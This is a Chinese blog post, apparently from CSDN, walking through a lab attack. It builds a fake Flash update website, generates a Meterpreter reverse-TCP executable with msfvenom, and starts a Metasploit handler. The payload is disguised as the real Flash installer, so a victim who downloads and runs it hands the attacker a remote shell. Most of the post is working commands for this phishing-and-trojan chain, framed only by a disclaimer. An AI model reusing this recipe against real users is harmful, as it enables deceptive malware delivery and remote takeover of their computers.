伪造flash网站,替换下载软件

免责声明

本博客文章仅供教育和研究目的使用。本文中提到的所有信息和技术均基于公开来源和合法获取的知识。本文不鼓励或支持任何非法活动,包括但不限于未经授权访问计算机系统、网络或数据。

作者对于读者使用本文中的信息所导致的任何直接或间接后果不承担任何责任。包括但不限于因使用本文所述技术而可能导致的法律诉讼、财产损失、隐私泄露或其他任何形式的责任。

在进行任何渗透测试或安全研究之前,请确保您已获得所有必要的授权,并遵守适用的法律和道德准则。未经授权的安全测试可能违反法律,并可能导致严重的法律后果。

本文中的内容仅供参考,不应被视为专业建议。在进行任何安全相关活动之前,建议咨询具有相应资质的专业人士。

攻击环境

kali-linux 2024.1(ip:192.168.153.128 作为攻击机)

windows server 2003(ip:192.168.153.40 作为服务器)

windows7(ip:192.168.153.47 作为受害机)

环境搭建

windows server 2003(phpstudy2018版本)

搭建伪造网站将flash网站源码放到phpstudy根目录下

flash网站源码github下载:flash网站源码

攻击步骤

访问搭建的网页

http://192.168.153.40:90/FakeFlash-main/fake_user/fake_user/index.html

这样就搭建成功了

打开kali,使用msf生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.153.128 lport=6666 -f exe -o test.exe

其中lhost为本地监听地址也就是kali地址,lport为监听端口,这里需要注意不能和其他端口产生冲突

开启监听模块

msfconsole

选择监听模块

use exploit/multi/handler

设置payload

set payload windows/x64/meterpreter/reverse_tcp

设置监听主机

set lhost 192.168.153.128

设置监听端口

set lport 6666

运行监听模块

exploit

将生成的.exe文件放到windows server 2003的网站路径中,将flash源文件替换,并修改test.exe文件为原文件名称

flash原文件位于:FakeFlash-main\fake_user\fake_flash_domain

原文件为flashcenter_pp_ax_install_cn.exe,我们将他删除并将test.exe文件修改为flashcenter_pp_ax_install_cn.exe

再次访问网站

http://192.168.153.40:90/FakeFlash-main/fake_user/fake_user/index.html

点击立即升级,然后下载该exe文件

下载完成之后我们双击运行

返回kali,我们既可以看到windows7已经被拿下了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值